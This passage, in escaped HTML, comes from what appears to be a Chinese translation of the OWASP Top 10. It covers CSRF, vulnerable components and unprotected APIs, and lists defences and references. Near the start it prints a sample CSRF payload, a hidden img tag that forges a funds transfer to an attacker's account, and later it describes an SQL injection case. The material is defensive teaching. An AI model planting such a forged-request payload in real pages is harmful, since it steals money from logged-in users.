href=\"http:\/\/example.com\/app\/transferFunds?amount=1500\">http:\/\/example.com\/app\/transferFunds?amount=1500<\/a><\/p>\n<p>&amp;destinationAccount=4673243243<\/p>\n<p>\u56e0\u6b64\uff0c\u653b\u51fb\u8005\u6784\u5efa\u4e00\u4e2a\u8bf7\u6c42\uff0c\u7528\u4e8e\u5c06\u53d7\u5bb3\u7528\u6237\u8d26\u6237\u4e2d\u7684\u73b0 \u91d1\u8f6c\u79fb\u5230\u81ea\u5df1\u8d26\u6237\u3002\u7136\u540e\u653b\u51fb\u8005\u5728\u5176\u63a7\u5236\u7684\u591a\u4e2a\u7f51\u7ad9\u7684\u56fe \u7247\u8bf7\u6c42\u6216iframe\u4e2d\u5d4c\u5165\u8fd9\u79cd\u653b\u51fb\u3002<\/p>\n<p>&lt;img src=&quot;<a href=\"http:\/\/example.com\/app\/transferFunds\">http:\/\/example.com\/app\/transferFunds<\/a>?<\/p>\n<p>amount=1500&amp;destinationAccount=attackersAcct#\u201c<\/p>\n<p>width=&quot;0&quot; height=&quot;0&quot; \/&gt;<\/p>\n<p>\u5982\u679c\u53d7\u5bb3\u7528\u6237\u901a\u8fc7example.com\u8ba4\u8bc1\u540e\u8bbf\u95ee\u4efb\u4f55\u4e00\u4e2a\u653b\u51fb \u8005\u7684\u7f51\u7ad9\uff0c\u4f2a\u9020\u7684\u8bf7\u6c42\u5c06\u81ea\u52a8\u5305\u542b\u7528\u6237\u7684\u4f1a\u8bdd\u4fe1\u606f\uff0c\u6388\u6743 \u6267\u884c\u653b\u51fb\u8005\u7684\u8bf7\u6c42\u3002<\/p>\n<p>\u53c2\u8003\u8d44\u6599<\/p>\n<p>OWASP<\/p>\n<p>\u2022 OWASP CSRF Article <\/p>\n<p>\u2022 OWASP CSRF Prevention Cheat Sheet <\/p>\n<p>\u2022 OWASP CSRFGuard - Java CSRF Defense Tool <\/p>\n<p>\u2022 OWASP CSRFProtector - PHP and Apache CSRF Defense Tool <\/p>\n<p>\u2022 ESAPI HTTPUtilities Class with AntiCSRF Tokens <\/p>\n<p>\u2022 OWASP Testing Guide: Chapter on CSRF Testing <\/p>\n<p>\u2022 OWASP CSRFTester - CSRF Testing Tool <\/p>\n<p>\u5176\u4ed6\u8d44\u6599<\/p>\n<p>\u2022 CWE Entry 352 on CSRF <\/p>\n<p>\u2022 Wikipedia article on CSRF<\/p>\n<p>A9<\/p>\n<p>\u4f7f\u7528\u542b\u6709\u5df2\u77e5\u6f0f\u6d1e\u7684\u7ec4\u4ef6<\/p>\n<p>\u6211\u5b58\u5728\u542b\u6709\u5df2\u77e5\u6f0f\u6d1e\u7ec4\u4ef6\u7684\u6f0f\u6d1e? <\/p>\n<p>\u7406\u8bba\u4e0a\uff0c\u5e94\u8be5\u662f\u5f88\u5bb9\u6613\u786e\u5b9a\u60a8\u5f53\u524d\u662f\u5426\u5728\u4f7f\u7528\u542b\u6709\u6f0f\u6d1e\u7684 \u7ec4\u4ef6\u6216\u8005\u5e93\u3002\u4e0d\u5e78\u7684\u662f\uff0c\u5546\u4e1a\u6216\u5f00\u6e90\u8f6f\u4ef6\u7684\u6f0f\u6d1e\u62a5\u544a\u5e76\u4e0d \u80fd\u4ee5\u6807\u51c6\u7684\u3001\u53ef\u67e5\u627e\u7684\u65b9\u5f0f\u6307\u5b9a\u53d7\u5f71\u54cd\u7ec4\u4ef6\u7684\u786e\u5207\u7248\u672c\u4fe1 \u606f\u3002\u66f4\u6709\u751a\u8005\uff0c\u5e76\u4e0d\u662f\u6240\u6709\u7684\u5e93\u90fd\u4f7f\u7528\u6613\u4e8e\u7406\u89e3\u7684\u7248\u672c\u7f16 \u53f7\u7cfb\u7edf\u3002\u6700\u7cdf\u7cd5\u7684\u662f\uff0c\u4e0d\u662f\u6240\u6709\u7684\u6f0f\u6d1e\u90fd\u62a5\u544a\u7ed9\u4e00\u4e2a\u65b9\u4fbf \u67e5\u8be2\u7684\u6f0f\u6d1e\u4e2d\u5fc3\uff0c\u5c3d\u7ba1\uff0c\u50cfCVE\u6216NVD\u8fd9\u6837\u7684\u7f51\u7ad9\u6b63\u53d8\u5f97 \u66f4\u6613\u4e8e\u641c\u7d22\u3002<\/p>\n<p>\u5224\u65ad\u60a8\u662f\u5426\u6613\u4e8e\u53d7\u5230\u8fd9\u7c7b\u653b\u51fb\uff0c\u8981\u6c42\u60a8\u4e0d\u4f46\u8981\u4e0d\u505c\u5730\u641c\u7d22 \u8fd9\u4e9b\u6570\u636e\u5e93\uff0c\u8fd8\u8981\u5173\u6ce8\u5927\u91cf\u7684\u90ae\u4ef6\u5217\u8868\u548c\u53ef\u80fd\u5305\u542b\u6f0f\u6d1e\u53d1 \u5e03\u7684\u516c\u544a\u4fe1\u606f\u3002\u5982\u679c\u60a8\u4f7f\u7528\u7684\u7ec4\u4ef6\u4e4b\u4e00\u5b58\u5728\u6f0f\u6d1e\uff0c\u60a8\u5e94\u8be5 \u4ed4\u7ec6\u8bc4\u4f30\u8be5\u6f0f\u6d1e\u662f\u5426\u7ed9\u60a8\u7684\u4e1a\u52a1\u4e5f\u5e26\u6765\u4e86\u7f3a\u9677\u3002\u6b64\u8bc4\u4f30\u53ef \u4ee5\u901a\u8fc7\u68c0\u67e5\u60a8\u7684\u4ee3\u7801\u4f7f\u7528\u8be5\u7ec4\u4ef6\u7684\u90e8\u5206\uff0c\u4ee5\u53ca\u8be5\u7f3a\u9677\u53ef\u80fd \u5bfc\u81f4\u7684\u60a8\u5173\u5fc3\u7684\u7ed3\u679c\u6765\u5b8c\u6210\u3002<\/p>\n<p>\u6211\u5982\u4f55\u9632\u6b62?<\/p>\n<p>\u5927\u591a\u6570\u7ec4\u4ef6\u9879\u76ee\u5e76\u4e0d\u4e3a\u5176\u8001\u7248\u672c\u63d0\u4f9b\u6f0f\u6d1e\u8865\u4e01\u3002\u76f8\u53cd\uff0c\u5b83\u4eec\u4ec5\u4ec5\u5728\u4e0b\u4e2a\u7248\u672c\u4e2d \u4fee\u6b63\u6b64\u95ee\u9898\u3002\u6240\u4ee5\u5347\u7ea7\u5230\u65b0\u7248\u672c\u662f\u5f88\u91cd\u8981\u7684\u3002\u8f6f\u4ef6\u9879\u76ee\u5e94\u8be5\u6709\u5982\u4e0b\u7684\u6d41\u7a0b\uff1a<\/p>\n<p>1.\u6301\u7eed\u7684\u6e05\u70b9\u6574\u7406\u5ba2\u6237\u7aef\u548c\u670d\u52a1\u5668\u7aef\u6240\u4f7f\u7528\u7684\u7ec4\u4ef6\u548c\u4e0e\u7ec4\u4ef6\u5b58\u5728\u4f9d\u8d56\u5173\u7cfb\u7684\u7ec4\u4ef6\u7684\u7248\u672c\u7b49\u4fe1\u606f <\/p>\n<p>2.\u8fde\u7eed\u76d1\u63a7\u5982NVD\u7b49\u62ab\u9732\u7684\u7684\u7ec4\u4ef6\u4e2d\u7684\u6f0f\u6d1e\u662f\u5426\u51fa\u73b0\u5728\u60a8\u7684\u5e94\u7528\u4e2d\u3002 \u4f7f\u7528\u8f6f\u4ef6\u7ed3\u5408\u5206\u6790\u5de5\u5177\u81ea\u52a8\u5316\u8fdb\u884c\u8fd9\u4e2a\u8fc7\u7a0b\u3002 <\/p>\n<p>3.\u5206\u6790\u5e93\u6587\u4ef6\u4ee5\u786e\u4fdd\u5728\u8fdb\u884c\u66f4\u6539\u4e4b\u524d\u5728\u8fd0\u884c\u65f6\u5b9e\u9645\u8c03\u7528\u4e86\u5b83\uff0c\u56e0\u4e3a\u7edd\u5927\u591a\u6570\u7ec4\u4ef6\u90fd\u4e0d\u4f1a\u88ab\u52a0\u8f7d\u6216\u8c03\u7528\u3002 <\/p>\n<p>4.\u51b3\u5b9a\u662f\u5347\u7ea7\u7ec4\u4ef6\uff08\u5982\u679c\u9700\u8981\uff0c\u91cd\u5199\u5e94\u7528\u7a0b\u5e8f\u4ee5\u5339\u914d\uff09\u8fd8\u662f\u90e8\u7f72\u4e00\u4e2a\u5206\u6790HTTP\u6d41\u91cf\uff0c\u6570\u636e\u6d41\u6216\u4ee3\u7801\u6267\u884c\u7684\u865a\u62df\u8865\u4e01\uff0c\u5e76\u9632\u6b62\u6f0f\u6d1e\u88ab\u5229\u7528\u3002<\/p>\n<p>\u653b\u51fb\u6848\u4f8b<\/p>\n<p>\u7ec4\u4ef6\u51e0\u4e4e\u603b\u662f\u4ee5\u5e94\u7528\u7a0b\u5e8f\u7684\u5168\u90e8\u7279\u6743\u8fd0\u884c\uff0c\u56e0\u6b64\u4efb\u4f55\u7ec4\u4ef6\u7684\u7f3a\u9677\u90fd\u53ef\u80fd\u5bfc\u81f4\u4e25\u91cd\u7684\u5f71\u54cd\u3002\u8fd9\u79cd\u7f3a\u9677\u53ef\u80fd\u662f\u5076\u7136\u7684\uff08\u4f8b\u5982\uff0c\u7f16\u7801\u9519\u8bef\uff09\u6216\u6709\u610f\u7684\uff08\u4f8b\u5982\u7ec4\u4ef6\u4e2d\u7684\u540e\u95e8\uff09\u3002 \u4e00\u4e9b\u653b\u51fb\u4f7f\u7528\u542b\u6709\u5df2\u77e5\u6f0f\u6d1e\u7684\u7ec4\u4ef6\u7684\u4f8b\u5b50\u662f:<\/p>\n<p>\u2022Apache CXF\u8ba4\u8bc1\u7ed5\u8fc7 \u2014\u672a\u80fd\u63d0\u4f9b\u8eab\u4efd\u4ee4\u724c\u7684\u60c5\u51b5\u4e0b\uff0c \u653b\u51fb\u8005\u53ef\u4ee5\u4ee5\u6700\u9ad8\u6743\u9650\u8c03\u7528\u4efb\u610f\u7684web\u670d\u52a1\u3002 \uff08Apache CXF \u662f\u4e00\u4e2a\u670d\u52a1\u6846\u67b6\uff0c\u4e0d\u8981\u4e0eApache\u5e94\u7528\u670d \u52a1\u5668\u6df7\u6dc6\u3002\uff09 <\/p>\n<p>\u2022Spring\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u2014\u6ee5\u7528Spring\u4e2d\u8bed\u8a00\u8868\u8fbe\u5f0f\u7684\u5b9e \u73b0\u5141\u8bb8\u653b\u51fb\u8005\u6267\u884c\u4efb\u610f\u4ee3\u7801\uff0c\u6709\u6548\u7684\u63a5\u7ba1\u670d\u52a1\u5668\u3002<\/p>\n<p>\u6bcf\u4e2a\u4f7f\u7528\u4e0a\u8ff0\u4e24\u4e2a\u4efb\u610f\u4e00\u4e2a\u5e93\u7684\u5e94\u7528\u7a0b\u5e8f\uff0c\u90fd\u662f\u6613\u4e8e\u53d7\u5230 \u653b\u51fb\u7684\u3002\u56e0\u4e3a\u4e24\u4e2a\u7ec4\u4ef6\u90fd\u4f1a\u88ab\u5e94\u7528\u7528\u6237\u76f4\u63a5\u8bbf\u95ee\u3002\u5176\u4ed6\u7684 \u6f0f\u6d1e\u5e93\uff0c\u5728\u5e94\u7528\u7a0b\u5e8f\u4e2d\u4f7f\u7528\u7684\u8d8a\u6df1\u5165\uff0c\u53ef\u80fd\u8d8a\u96be\u88ab\u5229\u7528\u3002<\/p>\n<p>\u53c2\u8003\u8d44\u6599<\/p>\n<p>OWASP<\/p>\n<p>\u2022 OWASP Dependency Check (for Java and .NET libraries) <\/p>\n<p>\u2022 OWASP Virtual Patching Best Practices<\/p>\n<p>\u5176\u4ed6\u8d44\u6599<\/p>\n<p>\u2022 The Unfortunate Reality of Insecure Libraries <\/p>\n<p>\u2022 MITRE Common Vulnerabilities and Exposures (CVE) search <\/p>\n<p>\u2022 National Vulnerability Database (NVD) <\/p>\n<p>\u2022 Retire.js for detecting known vulnerable Java libraries <\/p>\n<p>\u2022 Node Libraries Security Advisories <\/p>\n<p>\u2022 Ruby Libraries Security Advisory Database and Tools<\/p>\n<p>A10<\/p>\n<p>\u672a\u53d7\u4fdd\u62a4\u7684 APIs<\/p>\n<p>\u6211\u5bb9\u6613\u53d7\u5230\u653b\u51fb\u4e48?<\/p>\n<p>\u6d4b\u8bd5\u60a8\u7684API\u6f0f\u6d1e\u5e94\u8be5\u7c7b\u4f3c\u4e8e\u6d4b\u8bd5\u5176\u4ed6\u5e94\u7528\u7a0b\u5e8f\u7684\u6f0f\u6d1e\u3002 \u6240\u6709\u4e0d\u540c\u7c7b\u578b\u7684\u6ce8\u5165\uff0c\u8ba4\u8bc1\uff0c\u8bbf\u95ee\u63a7\u5236\uff0c\u52a0\u5bc6\uff0c\u914d\u7f6e\u548c\u5176\u4ed6\u95ee\u9898\u90fd\u53ef\u4ee5\u5728\u4f20\u7edf\u5e94\u7528\u7a0b\u5e8f\u4e2d\u51fa\u73b0\u7684\u4e5f\u5b58\u5728\u4e8eAPI\u4e2d.<\/p>\n<p>\u7136\u800c\uff0c\u7531\u4e8eAPI\u88ab\u7a0b\u5e8f\uff08\u800c\u4e0d\u662f\u4eba\u7c7b\uff09\u4f7f\u7528\uff0c\u6240\u4ee5\u4ed6\u4eec\u7ecf\u5e38\u7f3a\u5c11UI\uff0c\u5e76\u4e14\u8fd8\u4f7f\u7528\u590d\u6742\u7684\u534f\u8bae\u548c\u590d\u6742\u7684\u6570\u636e\u7ed3\u6784\u3002 \u8fd9\u4e9b\u56e0\u7d20\u53ef\u4ee5\u4f7f\u5b89\u5168\u6d4b\u8bd5\u53d8\u5f97\u56f0\u96be\u3002 \u4f7f\u7528\u5e7f\u6cdb\u4f7f\u7528\u7684\u683c\u5f0f\u53ef\u4ee5\u5e2e\u52a9\uff0c\u4f8b\u5982Swagger\uff08OpenAPI\uff09\uff0cREST\uff0cJSON\u548cXML\u3002 \u4e00\u4e9b\u6846\u67b6\uff0c\u5982GWT\u548c\u4e00\u4e9bRPC\u5b9e\u73b0\u4f7f\u7528\u81ea\u5b9a\u4e49\u683c\u5f0f\u3002 \u4e00\u4e9b\u5e94\u7528\u7a0b\u5e8f\u548cAPI\u521b\u5efa\u81ea\u5df1\u7684\u534f\u8bae\u548c\u6570\u636e\u683c\u5f0f\uff0c\u5982WebSockets\u3002 API\u7684\u5e7f\u6cdb\u6027\u548c\u590d\u6742\u6027\u4f7f\u5f97\u96be\u4ee5\u8fdb\u884c\u6709\u6548\u7684\u81ea\u52a8\u5316\u5b89\u5168\u6d4b\u8bd5\uff0c\u8fd9\u53ef\u80fd\u5bfc\u81f4\u865a\u5047\u7684\u5b89\u5168\u611f\u3002<\/p>\n<p>\u6700\u7ec8\uff0c\u77e5\u9053\u60a8\u7684API\u662f\u5426\u5b89\u5168\u610f\u5473\u7740\u9700\u8981\u4ed4\u7ec6\u9009\u62e9\u4e00\u79cd\u653b\u51fb\u7b56\u7565\u6765\u6d4b\u8bd5\u6240\u6709\u91cd\u8981\u7684\u9632\u5fa1\u3002<\/p>\n<p>\u6211\u5982\u4f55\u9632\u6b62?<\/p>\n<p>\u4fdd\u62a4API\u7684\u5173\u952e\u5728\u4e8e\u786e\u4fdd\u60a8\u5145\u5206\u4e86\u89e3\u5a01\u80c1\u6a21\u578b\u4ee5\u53ca\u9632\u5fa1\u65b9\u5f0f:<\/p>\n<p>1.\u786e\u4fdd\u60a8\u5df2\u7ecf\u4fdd\u62a4\u5ba2\u6237\u7aef\u548c\u60a8\u7684API\u4e4b\u95f4\u7684\u901a\u4fe1\u3002<\/p>\n<p>2.\u786e\u4fdd\u60a8\u7684API\u5177\u6709\u5f3a\u5927\u7684\u8eab\u4efd\u9a8c\u8bc1\u65b9\u6848\uff0c\u5e76\u4e14\u6240\u6709\u51ed\u636e\uff0c\u5bc6\u94a5\u548c\u4ee4\u724c\u5df2\u88ab\u4fdd\u62a4\u3002 <\/p>\n<p>3.\u786e\u4fdd\u60a8\u7684\u8bf7\u6c42\u4f7f\u7528\u7684\u4efb\u4f55\u6570\u636e\u683c\u5f0f\uff0c\u89e3\u6790\u5668\u90fd\u88ab\u914d\u7f6e\u5e76\u5f3a\u5316\u5230\u53ef\u4ee5\u9632\u6b62\u6b64\u7c7b\u653b\u51fb\u3002 <\/p>\n<p>4.\u5b9e\u73b0\u8bbf\u95ee\u63a7\u5236\u65b9\u6848\uff0c\u4fdd\u62a4API\u4e0d\u88ab\u4e0d\u6b63\u786e\u5730\u8c03\u7528\uff0c\u5305\u62ec\u672a\u7ecf\u6388\u6743\u7684\u529f\u80fd\u548c\u6570\u636e\u5f15\u7528. <\/p>\n<p>5.\u9632\u6b62\u6240\u6709\u5f62\u5f0f\u7684\u6ce8\u5165\uff0c\u5373\u4fbf\u5b83\u4eec\u9002\u7528\u4e8e\u666e\u901a\u5e94\u7528\uff0c\u4f46\u662f\u8fd9\u4e9b\u653b\u51fb\u5bf9API\u540c\u6837\u53ef\u884c\u3002<\/p>\n<p>\u786e\u4fdd\u60a8\u7684\u5b89\u5168\u5206\u6790\u548c\u6d4b\u8bd5\u6db5\u76d6\u6240\u6709API\uff0c\u60a8\u7684\u5de5\u5177\u53ef\u4ee5\u6709\u6548\u5730\u53d1\u73b0\u548c\u5206\u6790\u5b83\u4eec\u3002<\/p>\n<p>\u653b\u51fb\u6848\u4f8b<\/p>\n<p>\u6848\u4f8b #1:\u60f3\u8c61\u4e00\u4e0b\uff0c\u4e00\u4e2a\u79fb\u52a8\u7aef\u94f6\u884c\u5e94\u7528\u7a0b\u5e8f\u8fde\u63a5\u5230\u94f6\u884c\u7684XML API\uff0c\u7528\u4e8e\u83b7\u53d6\u5e10\u6237\u4fe1\u606f\u548c\u6267\u884c\u4ea4\u6613\u3002 \u653b\u51fb\u8005\u9006\u5411\u5e94\u7528\u7a0b\u5e8f\uff0c\u5e76\u53d1\u73b0\u7528\u6237\u5e10\u53f7\u4f5c\u4e3a\u8ba4\u8bc1\u8bf7\u6c42\u7684\u4e00\u90e8\u5206\u4e0e\u7528\u6237\u540d\u548c\u5bc6\u7801\u4e00\u8d77\u4f20\u9012\u5230\u670d\u52a1\u5668\u3002 \u653b\u51fb\u8005\u53d1\u9001\u5408\u6cd5\u51ed\u636e\uff0c\u4f46\u662f\u53d1\u9001\u53e6\u4e00\u4e2a\u7528\u6237\u7684\u5e10\u53f7\uff0c\u53ef\u4ee5\u83b7\u5f97\u5bf9\u5176\u4ed6\u7528\u6237\u5e10\u53f7\u7684\u5b8c\u5168\u8bbf\u95ee\u6743\u9650.<\/p>\n<p>\u6848\u4f8b #2:\u60f3\u8c61\u4e00\u4e0b\u7531\u7f51\u7edc\u542f\u52a8\u516c\u5171API\uff0c\u7528\u4e8e\u81ea\u52a8\u53d1\u9001\u77ed\u4fe1\u3002 API\u63a5\u53d7\u5305\u542b\u201ctransactionid\u201d\u5b57\u6bb5\u7684JSON\u6d88\u606f\u3002 API\u5c06\u6b64\u201ctransactionid\u201d\u503c\u89e3\u6790\u4e3a\u5b57\u7b26\u4e32\uff0c\u5e76\u5c06\u5176\u8fde\u63a5\u5230SQL\u67e5\u8be2\u4e2d\uff0c\u800c\u4e0d\u9700\u8981\u8f6c\u4e49\u6216\u53c2\u6570\u5316\u5b83\u3002 \u60a8\u53ef\u4ee5\u770b\u5230API\u4e0e\u4efb\u4f55\u5176\u4ed6\u7c7b\u578b\u7684\u5e94\u7528\u7a0b\u5e8f\u4e00\u6837\u5bb9\u6613\u53d7\u5230SQL\u6ce8\u5165\u3002<\/p>\n<p>\u5728\u4efb\u4f55\u4e00\u79cd\u60c5\u51b5\u4e0b\uff0c\u4f9b\u5e94\u5546\u53ef\u80fd\u4e0d\u63d0\u4f9b\u4f7f\u7528\u8fd9\u4e9b\u670d\u52a1\u7684Web UI\uff0c\u4ece\u800c\u4f7f\u5b89\u5168\u6d4b\u8bd5\u66f4\u52a0\u56f0\u96be\u3002<\/p>\n<p>\u53c2\u8003\u8d44\u6599<\/p>\n<p>OWASP<\/p>\n<p>\u2022 OWASP REST Security Cheat Sheet<\/p>\n<p>\u2022 OWASP Web Service Security Cheat Sheet<\/p>\n<p>\u5176\u4ed6\u8d44\u6599<\/p>\n<p>\u2022 Increasing Importance of APIs in Web Development <\/p>\n<p>\u2022 Tracking the Growth of the API Economy <\/p>\n<p>\u2022 The API Centric Future \u2022 The Growth of the API <\/p>\n<p>\u2022 What Do You Mean My Security Tools Don\u2019t Work on APIs?!! <\/p>\n<p>\u2022 State of API Security<\/p>\n<p>+D<\/p>\n<p>\u5f00\u53d1\u4eba\u5458\u4e0b\u4e00\u6b65\u505a\u4ec0\u4e48<\/p>\n<p>\u5efa\u7acb\u5e76\u4f7f\u7528\u53ef\u91cd\u590d\u4f7f\u7528\u7684\u5b89\u5168\u6d41\u7a0b\u548c\u6807\u51c6\u5b89\u5168\u63a7\u5236<\/p>\n<p>\u65e0\u8bba\u60a8\u662f\u521a\u63a5\u89e6web\u5e94\u7528\u7a0b\u5e8f\u5b89\u5168\u8fd8\u662f\u5df2\u7ecf\u975e\u5e38\u719f\u6089\u5404\u79cd\u98ce\u9669\uff0c\u521b\u5efa\u4e00\u4e2a\u5b89\u5168\u7684web\u5e94\u7528\u7a0b\u5e8f\u6216\u4fee\u590d\u4e00\u4e2a\u5df2\u5b58\u5728\u7684 \u5e94\u7528\u7a0b\u5e8f\u7684\u4efb\u52a1\u90fd\u53ef\u80fd\u5f88\u56f0\u96be\u3002\u5982\u679c\u60a8\u9700\u8981\u7ba1\u7406\u4e00\u4e2a\u5927\u578b\u7684\u5e94\u7528\u7a0b\u5e8f\u7ec4\u5408\uff0c\u90a3\u4efb\u52a1\u5c06\u662f\u5341\u5206\u8270\u5de8\u7684\u3002<\/p>\n<p>\u4e3a\u4e86\u5e2e\u52a9\u4f01\u4e1a\u7ec4\u7ec7\u548c\u5f00\u53d1\u4eba\u5458\u4ee5\u6700\u4f4e\u6210\u672c\u964d\u4f4e\u5e94\u7528\u7a0b\u5e8f\u7684\u5b89\u5168\u98ce\u9669\uff0cOWASP\u5236\u4f5c\u4e86\u8bb8\u591a\u514d\u8d39\u548c\u5f00\u6e90\u7684\u8d44\u6e90\u3002 \u60a8\u53ef\u4ee5\u4f7f \u7528\u8fd9\u4e9b\u8d44\u6e90\u6765\u89e3\u51b3\u60a8\u4f01\u4e1a\u7ec4\u7ec7\u7684\u5e94\u7528\u7a0b\u5e8f\u5b89\u5168\u95ee\u9898\u3002\u4ee5\u4e0b\u5185\u5bb9\u662fOWASP\u63d0\u4f9b\u7684\u4e3a\u5e2e\u52a9\u4f01\u4e1a\u7ec4\u7ec7\u521b\u5efa\u5b89\u5168\u7684web\u5e94\u7528\u7a0b\u5e8f \u7684\u4e00\u4e9b\u8d44\u6e90\u3002\u5728\u4e0b\u4e00\u9875\u4e2d\uff0c\u6211\u4eec\u5c06\u5c55\u793a\u5176\u4ed6\u53ef\u4ee5\u5e2e\u52a9\u4f01\u4e1a\u7ec4\u7ec7\u9a8c\u8bc1web\u5e94\u7528\u7a0b\u5e8f\u5b89\u5168\u6027\u7684OWASP\u8d44\u6e90\u3002<\/p>\n<p>\u8fd8\u6709\u8bb8\u591a\u5176\u4ed6\u7684OWASP\u8d44\u6e90\u53ef\u4f9b\u4f7f\u7528\u3002\u8bf7\u8bbf\u95eeOWASP\u9879\u76ee\u9875\u9762\uff0c\u5176\u4e2d\u5217\u51fa\u4e86OWASP\u9879\u76ee\u5e93\u5b58\u4e2d\u7684\u6240\u6709\u524d\u6cbf\u9879\u76ee\uff0c\u5b9e\u9a8c\u5ba4\u548c\u5b75\u5316\u5668\u9879\u76ee\u3002\u5927\u591a\u6570OWASP\u8d44\u6e90\u90fd\u53ef\u4ee5\u5728\u6211\u4eec\u7684wiki\u4e0a\u67e5\u770b\u5230\uff0c\u540c\u65f6\u53ef\u4ee5\u8ba2\u8d2d\u5404\u79cdOWASP\u7eb8\u8d28\u6587\u6863 \u6216\u7535\u5b50\u4e66\u3002<\/p>\n<p>+T<\/p>\n<p>\u5b89\u5168\u6d4b\u8bd5\u4eba\u5458\u4e0b\u4e00\u6b65\u505a\u4ec0\u4e48<\/p>\n<p>\u5efa\u7acb\u6301\u7eed\u7684\u5e94\u7528\u5b89\u5168\u6d4b\u8bd5<\/p>\n<p>\u5b89\u5168\u5730\u6784\u5efa\u4ee3\u7801\u5f88\u91cd\u8981\u3002 \u4f46\u662f\uff0c\u9a8c\u8bc1\u60a8\u8981\u6784\u5efa\u7684\u5b89\u5168\u6027\u662f\u5426\u771f\u5b9e\u5b58\u5728\uff0c\u6b63\u786e\u5b9e\u65bd\u5e76\u5728\u5176\u5e94\u7528\u7684\u4efb\u4f55\u5730\u65b9\u90fd\u5b9e\u65bd\u53d8\u5f97\u81f3\u5173\u91cd\u8981\u3002 \u5e94\u7528\u7a0b\u5e8f\u5b89\u5168\u6d4b\u8bd5\u7684\u76ee\u6807\u5c31\u662f\u63d0\u4f9b\u8fd9\u4e9b\u8bc1\u636e\u3002 \u5de5\u4f5c\u8270\u5de8\u590d\u6742\uff0c\u654f\u6377\u5f00\u53d1\u548cDevOps\u7b49\u73b0\u4ee3\u5316\u5feb\u901f\u8fc7\u7a0b\u5bf9\u4f20\u7edf\u7684\u65b9\u6cd5\u548c\u5de5\u5177\u65bd\u52a0\u4e86\u6781\u5927\u7684\u538b\u529b\u3002 \u56e0\u6b64\uff0c\u6211\u4eec\u5f3a\u70c8\u5efa\u8bae\u60a8\u8003\u8651\u5982\u4f55\u4e13\u6ce8\u4e8e\u6574\u4e2a\u5e94\u7528\u7a0b\u5e8f\u7ec4\u5408\u4e2d\u7684\u91cd\u8981\u5185\u5bb9\uff0c\u5e76\u4ee5\u7ecf\u6d4e\u9ad8\u6548\u7684\u65b9\u5f0f\u8fdb\u884c\u3002<\/p>\n<p>\u73b0\u4ee3\u98ce\u9669\u8fc5\u901f\u53d1\u5c55\uff0c\u6240\u4ee5\u6bcf\u5e74\u5bf9\u5e94\u7528\u7a0b\u5e8f\u8fdb\u884c\u4e00\u6b21\u626b\u63cf\u6216\u6e17\u900f\u6d4b\u8bd5\u65e5\u5b50\u5df2\u7ecf\u8fc7\u53bb\u4e86\u3002\u73b0\u4ee3\u8f6f\u4ef6\u5f00\u53d1\u9700\u8981\u5728\u6574\u4e2a\u8f6f\u4ef6\u5f00\u53d1\u751f\u547d\u5468\u671f\u4e2d\u8fdb\u884c\u6301\u7eed\u7684\u5e94\u7528\u7a0b\u5e8f\u5b89\u5168\u6d4b\u8bd5\u3002 \u5bfb\u6c42\u901a\u8fc7\u81ea\u52a8\u5316\u5b89\u5168\u6d4b\u8bd5\u6765\u589e\u5f3a\u73b0\u6709\u5f00\u53d1\u6d41\u6c34\u7ebf\uff0c\u800c\u4e14\u5f00\u53d1\u901f\u5ea6\u4e0d\u4f1a\u964d\u4f4e\u3002 \u65e0\u8bba\u60a8\u9009\u62e9\u54ea\u79cd\u65b9\u6cd5\uff0c\u90fd\u53ef\u4ee5\u8003\u8651\u5b9a\u671f\u6d4b\u8bd5\uff0c\u5206\u7c7b\uff0c\u4fee\u590d\uff0c\u91cd\u65b0\u6d4b\u8bd5\u548c\u91cd\u65b0\u90e8\u7f72\u5355\u4e2a\u5e94\u7528\u7a0b\u5e8f\u7684\u6210\u672c\u4e58\u4ee5\u5e94\u7528\u7a0b\u5e8f\u7ec4\u5408\u7684\u5927\u5c0f\u3002<\/p>\n<p>+O<\/p>\n<p>\u4f01\u4e1a\u7ec4\u7ec7\u7684\u4e0b\u4e00\u6b65\u505a\u4ec0\u4e48<\/p>\n<p>\u73b0\u5728\u5c31\u542f\u52a8\u60a8\u7684\u5e94\u7528\u7a0b\u5e8f\u5b89\u5168\u8ba1\u5212<\/p>\n<p>\u5e94\u7528\u7a0b\u5e8f\u5b89\u5168\u5df2\u7ecf\u4e0d\u518d\u662f\u4e00\u4e2a\u9009\u62e9\u4e86\u3002\u5728\u65e5\u76ca\u589e\u957f\u7684\u653b\u51fb\u548c\u76d1\u7ba1\u7684\u538b\u529b\u4e0b\uff0c\u4f01\u4e1a\u7ec4\u7ec7\u5fc5\u987b\u5efa\u7acb\u4e00\u4e2a\u6709\u6548\u7684\u80fd\u529b\u53bb\u786e \u4fdd\u5e94\u7528\u7a0b\u5e8f\u7684\u5b89\u5168\u3002\u7531\u4e8e\u5df2\u7ecf\u5728\u751f\u4ea7\u73af\u5883\u4e2d\u7684\u5e94\u7528\u7a0b\u5e8f\u548c\u4ee3\u7801\u884c\u6570\u91cf\u60ca\u4eba\uff0c\u8bb8\u591a\u4f01\u4e1a\u7ec4\u7ec7\u90fd\u5f97\u52aa\u529b\u5904\u7406\u6570\u91cf\u5de8\u5927\u7684\u6f0f\u6d1e\u3002 OWASP\u63a8\u8350\u8fd9\u4e9b\u4f01\u4e1a\u7ec4\u7ec7\u5efa\u7acb\u4e00\u4e2a\u5e94\u7528\u7a0b\u5e8f\u5b89\u5168\u8ba1\u5212\uff0c\u6df1\u5165\u4e86\u89e3\u5e76\u6539\u5584\u5b83\u4eec\u7684\u5e94\u7528\u7a0b\u5e8f\u7ec4\u5408\u7684\u5b89\u5168\u6027\u3002\u4e3a\u4e86\u83b7\u5f97\u5e94\u7528\u7a0b \u5e8f\u7684\u5b89\u5168\u6027\uff0c\u9700\u8981\u4e0d\u540c\u4f01\u4e1a\u7ec4\u7ec7\u4e2d\u7684\u591a\u4e2a\u90e8\u95e8\u4e4b\u95f4\u534f\u540c\u5de5\u4f5c\uff0c\u8fd9\u5305\u62ec\u4e86\u5b89\u5168\u548c\u5ba1\u8ba1\u3001\u8f6f\u4ef6\u5f00\u53d1\u3001\u548c\u5546\u4e1a\u4e0e\u6267\u884c\u7ba1\u7406\u3002\u5b83 